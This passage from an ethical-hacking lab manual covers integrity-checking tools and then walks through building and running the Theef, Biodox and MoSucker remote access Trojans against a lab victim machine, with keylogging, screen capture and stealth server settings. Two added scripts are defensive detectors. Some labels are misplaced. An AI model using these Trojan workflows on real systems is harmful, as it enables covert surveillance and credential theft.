27. Check the programs in Startup Manager, and then select the appropriate action.


FIGURE 8.29: jv16 Startup Manager dialogue. (Found software: 10 startup entries, among them jusched.exe, googletalk.exe, Reader_sl.exe, AdobeARM.exe, igfxtray.exe, hkcmd.exe and igfxpers.exe; selecting an entry shows whether the process is running, its PID, command line, memory usage and the registry key it was loaded from.)

28. Click the Registry Tools menu to view the registry icons.

FIGURE 8.30: jv16 Registry tools. (Tools shown: Registry Manager, Registry Finder, Registry Find & Replace, Registry Cleaner, Registry Compactor, Registry Information, Registry Monitor.)

29. Click File Tools to view the file icons.

The Verify Signatures option appears in the Options menu on systems that support image signing verification and can result in Autoruns querying certificate revocation list (CRL) web sites to determine if image signatures are valid.

The Hide Microsoft Entries selection omits images that have been signed by Microsoft if Verify Signatures is selected and omits images that have Microsoft in their resource's company name field if Verify Signatures is not selected.

Use the Hide Microsoft Entries or Hide Windows Entries in the Options menu to help you identify software that's been added to a system since installation. Autoruns prefixes the name of an image's publisher with "(Not verified)" if it cannot verify a digital signature for the file that's trusted by the system.


FIGURE 8.31: jv16 File tools.

30. Click System Tools to view the system icons.

FIGURE 8.32: jv16 System tools. (Tools shown: Software Uninstaller, Startup Manager, Start Menu Tool, Automation Tool, Service Manager, System Optimizer.)


The Hide Windows Entries option omits images signed by Windows if Verify Signatures is selected. If Verify Signatures is not selected, Hide Windows Entries omits images that have Microsoft in their resource's company name field and whose image resides beneath the %SystemRoot% directory.

Tools demonstrated in this lab are available in D:\CEH-Tools\CEHv8 Module 06 Trojans


31. Click Privacy Tools to view the privacy icons.

FIGURE 8.33: jv16 Privacy tools. (Tools shown: History Cleaner, Disk Wiper.)

32. Click Backups in the menu to display the Backup Tool dialog box.

FIGURE 8.34: jv16 Backup tool. (Tabs: Registry Backups, File Backups, Other Backups. The list shows one backup entry created by the Clean and fix run, of type "Data removed", 34.6 KB.)


33. Go to the Windows Server 2012 virtual machine.

34. Double-click Fsum FrontEnd.exe, the executable file located at D:\CEH-Tools\CEHv8 Module 06 Trojans and Backdoors\Files and Folder Integrity Checker\Fsum Frontend.

35. The Fsum Frontend main window is shown in the following screenshot.

FIGURE 8.35: FsumFrontEnd main window. (The Methods panel lists 96 hash and checksum algorithms; the Encoding selector defaults to Base 16 (hexadecimal).)

36. Select the type of hash that you want; let's say md5. Check the md5 check box.

TASK 5

FsumFrontEnd

CEH-Tools are also located on the mapped Network Drive (Z:) of the virtual machines.

FIGURE 8.36: FsumFrontEnd checking md5.

37. Select a file by clicking the File browse button and choosing it from the desktop. Here that file is Test.txt.

Have Autoruns automatically execute an Internet search in your browser by selecting Search Online in the Entry menu.

FIGURE 8.37: FsumFrontEnd file browse.

Autoruns displays the text "(Not verified)" next to the company name of an image that either does not have a signature or has a signature that is not signed by a certificate root authority on the list of root authorities trusted by the system.

FIGURE 8.38: Fsum Front End file open. (The Open dialog shows Test, a 0-byte text document, on the desktop.)

38. Click Add Folder to select a folder whose files are to be hashed, for example, D:\CEH-Tools.


Autoruns prefixes the name of an image's publisher with "(Not verified)" if it cannot verify a digital signature for the file that's trusted by the system.

FIGURE 8.39: FsumFrontEnd Add Folder.

A "Hide Signed Microsoft Entries" option helps you to zoom in on third-party auto-starting images that have been added to your system.

39. The files of the selected folder will be listed in a list box.

FIGURE 8.40: FsumFrontEnd Adding Folder.

FIGURE 8.41: FsumFrontEnd files list.

40. Click Generate checksum files. The progress bar shows the percentage of the hash files that have been generated.

FIGURE 8.42: FsumFrontEnd Generate checksum files.


You can also use the -e command-line option to launch Autoruns with administrative rights from the start.

41. The following is the list of md5 files after completion.
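As an added example (not part of this lab manual or of the Fsum Frontend tool), the following Python script does in code what steps 34 to 41 do in the GUI: it hashes every file under a folder, writes a checksum file in the md5sum-style `<digest> *<path>` layout, and later re-verifies the folder against that baseline, reporting modified, missing and newly added files. All file names and contents in `demo()` are constructed; the 0-byte file reproduces the lab's empty Test.txt.

```python
"""Folder integrity checker: generate a checksum baseline, then verify against it.

Added example, not the lab manual's or Fsum Frontend's own code.
Every sample file below is constructed inside a temporary directory.
"""
import hashlib
import tempfile
from pathlib import Path


def hash_file(path, algorithm="md5"):
    """Hex digest of one file, read in chunks so large files never sit in RAM."""
    h = hashlib.new(algorithm)
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def generate_checksums(folder, algorithm="md5"):
    """Map every regular file under folder (POSIX-style relative path) to its digest."""
    folder = Path(folder)
    return {
        p.relative_to(folder).as_posix(): hash_file(p, algorithm)
        for p in sorted(folder.rglob("*"))
        if p.is_file()
    }


def write_checksum_file(sums, out_path):
    """Write '<digest> *<relative path>' lines (the md5sum/sha*sum binary-mode layout)."""
    with open(out_path, "w", encoding="utf-8") as f:
        for rel, digest in sorted(sums.items()):
            f.write(f"{digest} *{rel}\n")


def read_checksum_file(path):
    """Parse a checksum file back into {relative path: digest}; blank and '#' lines are skipped."""
    sums = {}
    with open(path, encoding="utf-8") as f:
        for line in f:
            line = line.strip()
            if not line or line.startswith("#"):
                continue
            digest, _, rel = line.partition(" ")
            sums[rel.lstrip("*")] = digest.lower()
    return sums


def verify_checksums(folder, baseline, algorithm="md5"):
    """Compare the folder's current digests with the baseline; return three sorted lists."""
    current = generate_checksums(folder, algorithm)
    return {
        "modified": sorted(r for r in baseline if r in current and current[r] != baseline[r]),
        "missing": sorted(r for r in baseline if r not in current),
        "new": sorted(r for r in current if r not in baseline),
    }


def demo():
    """Constructed scenario: baseline a folder, tamper with it, verify again."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp) / "data"
        (root / "sub").mkdir(parents=True)
        (root / "Test.txt").write_bytes(b"")                  # 0-byte file, like the lab's Test.txt
        (root / "sub" / "notes.txt").write_bytes(b"hello")
        (root / "sub" / "old.bin").write_bytes(b"\x00\x01")

        checksum_file = Path(tmp) / "baseline.md5"          # kept outside the scanned folder
        write_checksum_file(generate_checksums(root), checksum_file)

        # Simulated changes made after the baseline was taken.
        (root / "sub" / "notes.txt").write_bytes(b"hello!")  # modified content
        (root / "sub" / "old.bin").unlink()                   # file removed
        (root / "sub" / "planted.dll").write_bytes(b"MZ")     # file added

        baseline = read_checksum_file(checksum_file)
        return baseline, verify_checksums(root, baseline)


if __name__ == "__main__":
    baseline, report = demo()
    for rel, digest in baseline.items():
        print(f"{digest} *{rel}")
    print(report)
```

Switching `algorithm` to `"sha256"` gives the same workflow with a collision-resistant digest, which is what a practitioner would prefer over md5 for integrity baselines.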

FIGURE 8.43: FsumFrontEnd progress of hash files. (The log pane shows the md5 digest computed for the 0-byte Test.txt on the desktop.)

FIGURE 8.44: FsumFrontEnd list of hash files.

Lab Analysis

Analyze and document the results related to the lab exercise. Give your opinion on your target's security posture and exposure through public and free information.


PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS RELATED TO THIS LAB.

Questions

1. Scenario: Alice wants to use TCPView to keep an eye on external connections. However, sometimes there are large numbers of connections with a Remote Address of "localhost:####". These entries do not tell Alice anything of interest, and the large quantity of entries causes useful entries to be pushed out of view.

2. Is there any way to filter out the "localhost:####" Remote Address entries?

3. Evaluate what other details are displayed by "autoruns" and analyze the working of the autoruns tool.

4. Evaluate the other options of jv16 PowerTools and analyze the result.

5. Evaluate and list the algorithms that Fsum FrontEnd supports.

Internet Connection Required

☐ Yes ☑ No

Platform Supported

☑ Classroom ☑ iLabs


Creating a Server Using the Theef

Theef is a Windows-based application for both the client and server end. The Theef server is a virus that you install on your victim's computer, and the Theef client is what you then use to control the virus.

L a b S c e n a r io

A backdoor Trojan provides remote, usually surreptitious, access to affected systems. A backdoor Trojan may be used to conduct distributed denial-of- service (D D oS) attacks, 01־ it may be used to install additional Trojans 01־ other forms o f m alicious software. For example, a backdoor Trojan may be used to install a downloader 01־ dropper Trojan, which may 111 turn install a proxy Trojan used to relay spam 01־ a kevlogger Trojan, which monitors and sends keystrokes to remote attackers. A backdoor Trojan may also open ports 011 the affected system and thus potentially lead to further compromise by other attackers.

You are a security adm inistrator o f your company, and your job responsibilities include protecting the network from Trojans and backdoors, Trojan attacks, stealing valuable data from the network, and identity theft.

Lab Objectives

The objective of this lab is to help students learn to detect Trojan and backdoor attacks.

The objectives of the lab include:

■ Creating a server and testing the network for attack

■ Detecting Trojans and backdoors

■ Attacking a network using sample Trojans and documenting all vulnerabilities and flaws detected

Lab Environment

To carry this out, you need:

■ Theef tool located at D:\CEH-Tools\CEHv8 Module 06 Trojans and Backdoors\Trojans Types\Remote Access Trojans (RAT)\Theef

ICON KEY

Valuable information

Test your knowledge

Web exercise

Workbook review

Tools demonstrated in this lab are available in D:\CEH-Tools\CEHv8 Module 06 Trojans and Backdoors


■ A computer running Windows Server 2012 as host machine

■ A computer running Windows 8 Virtual Machine (Attacker)

■ Windows Server 2008 running in Virtual Machine (Victim)

■ A web browser with Internet access

■ Administrative privileges to run tools

Lab Duration

Time: 20 Minutes

Overview of Trojans and Backdoors

A Trojan is a program that contains malicious or harmful code inside apparently harmless programming or data in such a way that it can get control and cause damage, such as ruining the file allocation table on a hard drive.

Note: The versions of the created client or host and the appearance of the website may differ from what is shown in the lab, but the actual process of creating the server and the client is the same as shown in this lab.

Lab Tasks

1. Launch Windows Server 2008 Virtual Machine and navigate to Z:\CEH-Tools\CEHv8 Module 06 Trojans and Backdoors\Trojans Types\Remote Access Trojans (RAT)\Theef.

2. Double-click Server210.exe to run the Trojan on the victim's machine.

FIGURE 8.1: Windows Server 2008 - Theef Folder (Explorer view of the Theef folder under Trojans Types\Remote Access Trojans (RAT))

3. In the Open File - Security Warning window, click Run, as shown in the following screenshot.

TASK 1: Create Server with ProRat


FIGURE 8.2: Windows Server 2008 - Security Warning (Open File - Security Warning for Server210.exe: Unknown Publisher, no valid digital signature; click Run)

4. Launch Windows 8 Virtual Machine and navigate to Z:\CEHv8 Module 06 Trojans and Backdoors\Trojans Types\Remote Access Trojans (RAT)\Theef.

5. Double-click Client210.exe to access the victim machine remotely.

FIGURE 8.3: Windows 8 - Running Client210.exe (Theef folder contents: Client210.exe, EditServer210.exe, Server210.exe, pass.dll, Scanner.dll, zip.dll, upx.exe, readme.txt)

6. In the Open File - Security Warning window, click Run, as shown in the following screenshot.


FIGURE 8.4: Windows 8 - Security Warning (Open File - Security Warning for Client210.exe: Unknown Publisher, no valid digital signature; click Run)

7. The main window of Theef appears, as shown in the following screenshot.

FIGURE 8.5: Theef Main Screen (Connect panel with IP, Port 6703 and FTP 2968 fields; Theef version 2.10, 01/November/2004)

8. Enter an IP address in the IP field, and leave the Port and FTP fields at their defaults.

9. In this lab we are attacking Windows Server 2008 (10.0.0.13). Click Connect after entering the IP address of Windows Server 2008.


FIGURE 8.6: Theef Connecting to Victim Machine (Connect panel, Computer Information pane)

10. Now in Windows 8 you have access to view the Windows Server 2008 machine remotely.

Theef client log (from the screenshot, connected to 10.0.0.13, Port 6703, FTP 2968):

[15:05:31] Attempting connection with 10.0.0.13
[15:05:31] Connection established with 10.0.0.13
[15:05:31] Connection accepted
[15:05:31] Connected to transfer port

FIGURE 8.7: Theef Gained access of Victim Machine (status: Connected to server)

11. To view the computer information, click the Computer icon at the bottom of the window.

12. In Computer Information, you are able to view PC Details, OS Info, Home, and Network by clicking the respective buttons.


FIGURE 8.8: Theef Computer Information (Reply: PC Details received)

13. Click the Spy icon to capture screens, log keystrokes, etc. on the victim's machine.

Computer Information returned by the server (from the screenshot):

User name: Administrator
Computer name: WIN-EGBHISG14L0
Registered organisation: Microsoft; Registered owner: Microsoft; Workgroup: [Unknown]
Available memory: 565 Mb of 1022 Mb; Processor: GenuineIntel Intel64 Family 6 Model 42 Stepping 7 (3095 Mhz)
Display res: 800 x 600; Printer: [Unknown]
Hard drives: C:\ (6,186 Mb of 16,381 Mb free)

FIGURE 8.9: Theef Spy (PC Details, OS Info, Home, Network buttons)

14. Select Keylogger to record the keystrokes of the victim.

15. In the Keylogger window, click the Play button to record the keystrokes.


FIGURE 8.9: Theef Keylogger Window (Keylogger [Started])

16. Now go to Windows Server 2008 and type some text in Notepad to record the keystrokes.

Keylogger output (from the screenshot):

[New Text Document.txt - Notepad] HiBob{BACKSPACE}{BACKSPACE}{BACKSPACE} Billy U have been hacked by the world famouse {BACKSPACE} hacker.{CTRL}{CTRL}{ALT}

FIGURE 8.10: Theef recorded Key Strokes

17. Similarly, you can access the details of the victim's machine by clicking the respective icons.

Lab Analysis

Analyze and document the results related to the lab exercise. Give your opinion on your target's security posture and exposure through public and free information.


PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS RELATED TO THIS LAB.

Tool/Utility    Information Collected/Objectives Achieved
Theef           Output: Victim's machine PC Information; Victim's machine keystrokes

Questions

1. Is there any way to filter out the "localhost:####" remote address entries?

2. Evaluate the other details displayed by "autoruns" and analyze the working of the autoruns tool.

Internet Connection Required

☐ Yes ☑ No

Platform Supported

☑ Classroom ☑ iLabs


Creating a Server Using the Biodox

Theef is a Windows-based application for both the client and server end. The Theef server is a virus that you install on your victim's computer, and the Theef client is what you then use to control the virus.

Lab Scenario

You are a security administrator of your company, and your job responsibilities include protecting the network from Trojans and backdoors, Trojan attacks, theft of valuable data from the network, and identity theft.

Lab Objectives

The objective of this lab is to help students learn to detect Trojan and backdoor attacks.

The objectives of the lab include:

■ Creating a server and testing the network for attack

■ Detecting Trojans and backdoors

■ Attacking a network using sample Trojans and documenting all vulnerabilities and flaws detected

Lab Environment

To carry this out, you need:

■ Biodox tool located at D:\CEH-Tools\CEHv8 Module 06 Trojans and Backdoors\Trojans Types\GUI Trojans\Biodox Trojan

■ A computer running Windows Server 2012 as Host Machine

■ A computer running Windows 8 Virtual Machine (Attacker)

■ Windows Server 2008 running in Virtual Machine (Victim)

■ A web browser with Internet access

■ Administrative privileges to run tools



Lab Duration

Time: 20 Minutes

Overview of Trojans and Backdoors

A Trojan is a program that contains malicious or harmful code inside apparently harmless programming or data in such a way that it can get control and cause damage, such as ruining the file allocation table on a hard drive.

Note: The versions of the created client or host and the appearance of the website may differ from what is shown in the lab, but the actual process of creating the server and the client is the same as shown in this lab.

Lab Tasks

1. Launch Windows 8 Virtual Machine and navigate to Z:\CEHv8 Module 06 Trojans and Backdoors\Trojans Types\GUI Trojans\Biodox Trojan.

2. Double-click BIODOX OE Edition.exe to run the Trojan on the victim's machine.

FIGURE 9.1: Windows 8 - Biodox Contents (Biodox folder: Language, Plugins, BIODOX OE Edition.exe, MSCOMCTL.OCX, MSWINSCK.OCX, res.gif, settings.ini)

3. In the Open File - Security Warning window, click Run, as shown in the following screenshot.

TASK 1: Create Server with ProRat

FIGURE 9.2: Windows 8 - Security Warning (Open File - Security Warning for BIODOX OE Edition.exe: Unknown Publisher, no valid digital signature; click Run)


4. Select your preferred language from the drop-down list in the Biodox main window; in this lab we have selected English.

FIGURE 9.3: Windows 8 - Biodox main window language selection (left pane: communication, passwords, manage files, keyboard, msn settings, settings manager, system information, file manager, commands, capture, server properties, local tools, contact us; Port panel: Connection 6661, Transfer 6662, Screen 6663, WebCam 6664; Status: Ready)

5. Now click the Server Editor button to build a server as shown in the following screenshot.

FIGURE 9.4: Windows 8 - Security Warning (Server Editor panel: Fake Error Message with Msg Title, Message "biodox was here" and Message Icon; IP/DNS Address; ports Connection 6661, Transfer 6662, Screen Capture 6663, Webcam Capture 6664; Victim Name; Install Path (System32, Windows, Temp); Connection Delay; Server Mode; Registry Settings Key: mssrs32)

6. In Server Editor options, enter a victim's IP address in the IP/DNS field; in this lab we are using Windows Server 2008 (10.0.0.13).


7. Leave the rest of the settings at their defaults; to build a server click the Create Server button.

Note: IP addresses may differ in your classroom labs.

FIGURE 9.5: Biodox Main Screen (Server Editor filled in: Address 10.0.0.13; Connection 6661, Transfer 6662, Screen Capture 6663, Webcam Capture 6664; Name: victim; Install Path: System32; Connection Delay: 10; Registry Settings Key: mssrs32, Value: mssrs32.exe; create server button)

8. Server.exe file will be created in its default directory: Z:\CEHv8 Module 06 Trojans and Backdoors\Trojans Types\GUI Trojans\Biodox Trojan.

FIGURE 9.5: Biodox services (Biodox folder now containing server.exe)

9. Now switch to Windows Server 2008 Virtual Machine, and navigate to Z:\CEHv8 Module 06 Trojans and Backdoors\Trojans Types\GUI Trojans\Biodox Trojan to run the server.exe file.


FIGURE 9.6: Biodox server.exe (Windows Server 2008 Explorer view of the Biodox folder)

10. Double-click server.exe in Windows Server 2008 virtual machine, and click Run in the Open File - Security Warning dialog box.

FIGURE 9.7: Run the tool (Open File - Security Warning for ...pes\GUI Trojans\Biodox Trojan\Biodox\server.exe: Unknown Publisher, no valid digital signature; click Run)

11. Now switch to Windows 8 Virtual Machine and click the active/deactive status button to see the connected machines.


FIGURE 9.8: Biodox open source editor (Server Editor after the build; Status: Settings saved and server created)

12. After getting connected you can view connected victims as shown in the following screenshot.

FIGURE 9.9: Biodox open source editor (victim list row: user Administrator on WIN-EGB..., Win Vista, 0.99 GB RAM; Status: client Active)

13. Now you can perform actions on the victim by selecting the appropriate action tab in the left pane of the Biodox window.

14. Now click the settings manager option to view the applications running and other application settings.


FIGURE 9.9: Biodox open source editor (settings manager, applications tab: process list with Name, PID, Path, Memory and Priority columns showing smss.exe, csrss.exe, wininit.exe, winlogon.exe, services.exe, lsass.exe, lsm.exe, svchost.exe; Status: successfully)

15. You can also record the screenshots of the victim by clicking the Screen Capture button.

16. Click the Start Screen Capture button to capture screenshots of the victim's machine.

FIGURE 9.10: Screen capture

17. Biodox displays the captured screenshot of the victim's machine.


FIGURE 9.11: Screen capture (victim desktop showing the Recycle Bin and New Text Document.txt)

18. Similarly, you can access the details of the victim's machine by clicking the respective functions.

Lab Analysis

Analyze and document the results related to the lab exercise. Give your opinion on your target's security posture and exposure through public and free information.
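Both the Theef lab and the Biodox lab leave artifacts a defender can look for on the victim: a server listening on the tool's default ports (6703 and 2968 for Theef, 6661 to 6664 for Biodox) and, for Biodox, the Registry Settings value mssrs32 / mssrs32.exe that its Server Editor pre-fills. The following added example, which is not part of the lab manual, parses netstat -ano and reg query output and flags those indicators; the sample lines, the PIDs and the assumption that the Biodox value lands in the HKLM Run key are constructed for this example.

```python
"""Flag RAT indicators from the Theef and Biodox labs in netstat/reg output.

Added example for the lab analysis (not part of the CEH manual). The sample
netstat and registry lines at the bottom are constructed, not captured.
"""
import re
from typing import Dict, List

# Default ports shown in the Theef (Figures 8.5/8.7) and Biodox (Figures
# 9.3-9.5) screenshots. A server left on its defaults is easy to spot.
RAT_DEFAULT_PORTS: Dict[int, str] = {
    6703: "Theef control port",
    2968: "Theef FTP/transfer port",
    6661: "Biodox connection port",
    6662: "Biodox transfer port",
    6663: "Biodox screen-capture port",
    6664: "Biodox webcam port",
}

# Registry value name the Biodox Server Editor pre-fills (Key: mssrs32,
# Value: mssrs32.exe). Which Run key it is written to is an assumption here.
RAT_RUN_VALUE_NAMES = {"mssrs32"}

# One "netstat -ano" row: proto, local addr:port, remote addr:port, [state], pid
NETSTAT_ROW = re.compile(
    r"^\s*(TCP|UDP)\s+(\S+):(\d+)\s+(\S+):(\S+)\s+(?:([A-Z_]+)\s+)?(\d+)\s*$"
)

# One "reg query" value row: name, type, data (command-line args not stripped)
REG_ROW = re.compile(r"^\s*(\S+)\s+(REG_[A-Z_]+)\s+(.+?)\s*$")


def parse_netstat(text: str) -> List[Dict]:
    """Turn netstat -ano output into dicts; header and blank lines are skipped."""
    rows = []
    for line in text.splitlines():
        m = NETSTAT_ROW.match(line)
        if not m:
            continue
        proto, laddr, lport, raddr, rport, state, pid = m.groups()
        rows.append({
            "proto": proto,
            "local": laddr, "lport": int(lport),
            "remote": raddr, "rport": int(rport) if rport.isdigit() else None,
            "state": state or "",
            "pid": int(pid),
        })
    return rows


def find_rat_connections(netstat_text: str) -> List[Dict]:
    """Return rows whose local or remote port is a known RAT default.

    A LISTENING socket on one of these ports is the server (victim) side;
    an ESTABLISHED row on the same port is the live control channel seen
    in the Theef client log of step 10.
    """
    hits = []
    for row in parse_netstat(netstat_text):
        for port in (row["lport"], row["rport"]):
            if port in RAT_DEFAULT_PORTS:
                hits.append({**row, "port": port, "label": RAT_DEFAULT_PORTS[port]})
                break
    return hits


def find_rat_run_entries(reg_text: str) -> List[Dict]:
    """Return Run-key values whose name or executable matches the Biodox default."""
    hits = []
    for line in reg_text.splitlines():
        m = REG_ROW.match(line)
        if not m:
            continue
        name, rtype, data = m.groups()
        exe = data.replace("\\", "/").rsplit("/", 1)[-1].lower()
        if name.lower() in RAT_RUN_VALUE_NAMES or exe.split(".")[0] in RAT_RUN_VALUE_NAMES:
            hits.append({"name": name, "type": rtype, "data": data})
    return hits


# Constructed sample: victim 10.0.0.13 running the Theef server (PIDs made up)
SAMPLE_NETSTAT = """
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       704
  TCP    0.0.0.0:6703           0.0.0.0:0              LISTENING       1552
  TCP    10.0.0.13:6703         10.0.0.12:49221        ESTABLISHED     1552
  TCP    10.0.0.13:2968         10.0.0.12:49222        ESTABLISHED     1552
  TCP    10.0.0.13:49160        10.0.0.5:445           ESTABLISHED     4
  UDP    0.0.0.0:123            *:*                                    1024
"""

# Constructed sample of "reg query HKLM\...\Run" output after a Biodox install
SAMPLE_REG = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    SecurityHealth    REG_EXPAND_SZ    %windir%\system32\SecurityHealthSystray.exe
    mssrs32           REG_SZ           C:\Windows\System32\mssrs32.exe
"""

if __name__ == "__main__":
    for h in find_rat_connections(SAMPLE_NETSTAT):
        print(f"PID {h['pid']}: {h['proto']} {h['local']}:{h['lport']} -> "
              f"{h['remote']} {h['state']} ({h['label']})")
    for h in find_rat_run_entries(SAMPLE_REG):
        print(f"Run value {h['name']} = {h['data']}")
```

On a real host, feed the script the output of netstat -ano and reg query for the Run keys, and treat any hit as a lead to confirm with the process's image path rather than as proof on its own.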

PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS RELATED TO THIS LAB.

Tool/Utility    Information Collected/Objectives Achieved
Biodox          Output: Record the screenshots of the victim machine

Internet Connection Required

☐ Yes ☑ No

Platform Supported

☑ Classroom ☑ iLabs


Creating a Server Using the MoSucker

MoSucker is a Visual Basic Trojan. MoSucker's edit server program has a client with the same layout as SubSeven's client.

Lab Scenario

A backdoor is a secret or unauthorized channel for accessing a computer system. In an attack scenario, hackers install backdoors on a machine, once compromised, to access it in an easier manner at later times. With the growing use of e-commerce, web applications have become the target of choice for attackers. With a backdoor, an attacker can virtually have full and undetected access to your application for a long time. It is critical to understand the ways backdoors can be installed and to take the required preventive steps.

You are a security administrator of your company, and your job responsibilities include protecting the network from Trojans and backdoors, Trojan attacks, theft of valuable data from the network, and identity theft.

Lab Objectives

The objective of this lab is to help students learn to detect Trojan and backdoor attacks.

The objectives of the lab include:

■ Creating a server and testing the network for attack

■ Detecting Trojans and backdoors

■ Attacking a network using sample Trojans and documenting all vulnerabilities and flaws detected

Lab Environment

To carry this out, you need:

■ MoSucker tool located at D:\CEH-Tools\CEHv8 Module 06 Trojans and Backdoors\Trojans Types\GUI Trojans\MoSucker

■ A computer running Windows Server 2012 as host machine



■ A computer running Windows 8 Virtual Machine (Attacker)

■ Windows Server 2008 running in Virtual Machine (Victim)

■ A web browser with Internet access

■ Administrative privileges to run tools

Lab Duration

Time: 20 Minutes

Overview of Trojans and Backdoors

A Trojan is a program that contains malicious or harmful code inside apparently harmless programming or data in such a way that it can get control and cause damage, such as ruining the file allocation table on a hard drive.

Note: The versions of the created client or host and the appearance of the website may differ from what is shown in the lab, but the actual process of creating the server and the client is the same as shown in this lab.

Lab Tasks

TASK 1: Create Server with ProRat

1. Launch Windows 8 Virtual Machine and navigate to Z:\CEHv8 Module 06 Trojans and Backdoors\Trojans Types\GUI Trojans\MoSucker.

2. Double-click the CreateServer.exe file to create a server.

FIGURE 10.1: Install createServer.exe (MoSucker folder: AV Firewall events, cgi, plugins, runtimes, screenshots, skins, stub, CreateServer.exe, MoSucker.exe, ReadMe.txt)

3. In the Open File - Security Warning dialog box, click Run.


FIGURE 10.2: Install createServer.exe (Open File - Security Warning for ...Trojans Types\GUI Trojans\MoSucker\CreateServer.exe: Unknown Publisher, no valid digital signature; click Run)

4. The MoSucker Server Creator/Editor window appears; leave the default settings and click OK.

FIGURE 10.3: Install createServer.exe (MoSucker 3.0 Server Creator/Editor: coded by Superchachi, contains code from MoSucker 2.2 by Krusty, compiled for Public release B on November 20/2002, VB6; options: create a stealth trojan server for a victim, include Msvbvm60.dll in the server (adds 750 KB), include mswinsock.ocx in the server (adds 50 KB, recommended), pack for minimal file size, MoSucker Transport Cipher Key, start configuration after creating the server; create a visible server for local testing; edit an existing server)

5. Use the file name server.exe and, to save it in the same directory, click Save.



FIGURE 10.4: Save Server.exe (Save dialog in the MoSucker folder; Save as type: Executable Files (*.exe))

6. MoSucker will generate a server with the complete settings in the default directory.

FIGURE 10.5: Install server progress (MoSucker 3.0: Generating server... 100% complete; Build Date: 11/28/2002 2:04:12 AM; Build Info: MoSucker 3.0 Public Release B; Level Accessed: Public UPX; steps: Verifying necessary filepaths, Preparing first stub, Preparing second stub, Packing first stub, Packing second stub, Modifying file headers)

7. Click OK in the Edit Server pop-up message.

FIGURE 10.6: Server created successfully (Edit Server 3.0: Server created successfully! Server size: 158 KB. Do not repack server.)

8. In the MoSucker wizard, change the Victim's Name to Victim or leave all the settings at their defaults.


FIGURE 10.7: Give the victim machine details (MoSucker 3.0 Name/Port page: Selected Server, Server ID, Cypher Key, Victim's Name: victim, Server Name(s): kernel32,msconfig,winexec32,netconfig, Extension(s): exe,pif,bat,..., Connection Port, Prevent same server multi-infections (recommended), optional Windows icon for the custom file extension; left pane: Name/Port, Password, Notification 1, Notification 2, Options, Keylogger, Plug-ins, Fake Error, File Properties; Save, Read)

9. Now click Keylogger in the left pane, check the Enable off-line keylogger option, and then click Save.

10. Leave the rest of the settings at their defaults.

[MoSucker 3.0 Edit Server dialog, Keylogger tab: "Enable off-line keylogger" checked, Log Filename monitor.log, and "Enable Smart Logging" with a comma-separated list of key words that trigger the keylogger]
FIGURE 10.8: Enable the keylogger

11. Click OK in the EditServer pop-up message.

MoSucker EditServer 3.0 dialog: Server saved successfully. Final server size: 158 KB. [OK]
FIGURE 10.9: Server save file

12. Now switch to the Windows Server 2008 Virtual Machine, and navigate to Z:\CEHv8 Module 06 Trojans and Backdoors\Trojans Types\GUI Trojans\MoSucker to run the server.exe file.

FIGURE 10.10: Click server.exe

13. Double-click server.exe in the Windows Server 2008 virtual machine, and click Run in the Open File - Security Warning dialog box.

[Open File - Security Warning dialog: "The publisher could not be verified. Are you sure you want to run this software?" Name: ...\Trojans Types\GUI Trojans\MoSucker\server.exe; Publisher: Unknown Publisher; Type: Application; From: Z:\CEHv8 Module 06 Trojans and Backdoors\Trojan...; buttons Run and Cancel. "This file does not have a valid digital signature that verifies its publisher. You should only run software from publishers you trust."]
FIGURE 10.11: Click on Run

14. Now switch to the Windows 8 Virtual Machine and navigate to Z:\CEHv8 Module 06 Trojans and Backdoors\Trojans Types\GUI Trojans\MoSucker to launch MoSucker.exe.

15. Double-click MoSucker.exe.

FIGURE 10.12: Click MoSucker.exe

16. In the Open File - Security Warning dialog box, click Run to launch MoSucker.

[Open File - Security Warning dialog: "The publisher could not be verified. Are you sure you want to run this software?" Name: ...\Trojans Types\GUI Trojans\MoSucker\MoSucker.exe; Publisher: Unknown Publisher; Type: Application; From: Z:\CEHv8 Module 06 Trojans and Backdoors\Trojans T...; buttons Run and Cancel. "This file does not have a valid digital signature that verifies its publisher. You should only run software from publishers you trust."]

FIGURE 10.13: Run the application

17. The MoSucker main window appears, as shown in the following figure.

[MoSucker main window: IP address and port fields with a Connect button; left pane with Misc stuff, Information, File related, System, Spy related, Fun stuff I, Fun stuff II and Live capture]

FIGURE 10.14: MoSucker main window

18. Enter the IP address of the victim and the port number you noted at the time of server configuration, and then click Connect.

19. In this lab, we noted the Windows Server 2008 virtual machine's IP address (10.0.0.13) and port number 4288.

Note: These might differ in your classroom labs.

FIGURE 10.15: connect to victim machine

20. The Connect button automatically turns to Disconnect once the connection with the victim machine is established, as shown in the following screenshot.

FIGURE 10.16: connection established

21. Now click Misc stuff in the left pane, which shows the different options an attacker can use to perform actions on the victim's machine from his or her own system.

FIGURE 10.17: setting server options

22. You can also access the victim's machine remotely by clicking Live capture in the left pane.

23. In the Live capture option, click Start, which will open the remote desktop of the victim's machine.

[MoSucker main window with Live capture selected: port 4288 connected (Disconnect button) and Options; Live capture panel with "Make screenshot", JPEG Quality choices from 20% to 90%, a Start button and Settings]
FIGURE 10.18: start capturing

24. The remote desktop connection of the victim's machine is shown in the following figure.

Tools demonstrated in this lab are available in D:\CEH-Tools\CEHv8 Module 06 Trojans and Backdoors

[Remote administration mode window. RA mode options: Resize window to 4:3; JPG Quality; Delay in ms 1000; Send mouseclicks; Send pressed keys; Send mousemoves; AutoUpdate pics; Fullscreen]

FIGURE 10.19: capturing victim machine

25. You can access files, modify the files, and so on in this mode.

FIGURE 10.20: capturing victim machine

26. Similarly, you can access the details of the victim's machine by clicking the respective functions.

Lab Analysis

Analyze and document the results related to the lab exercise. Give your opinion on your target's security posture and exposure through public and free information.

PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS RELATED TO THIS LAB.

Tool/Utility: MoSucker

Information Collected/Objectives Achieved: Output: Record the screenshots of the victim's machine

Questions

1. Evaluate and examine various methods to connect to victims if they are in different cities or countries.

Internet Connection Required: ☐ Yes ☑ No

Platform Supported: ☑ Classroom ☑ iLabs

Hack Windows 7 Using Metasploit

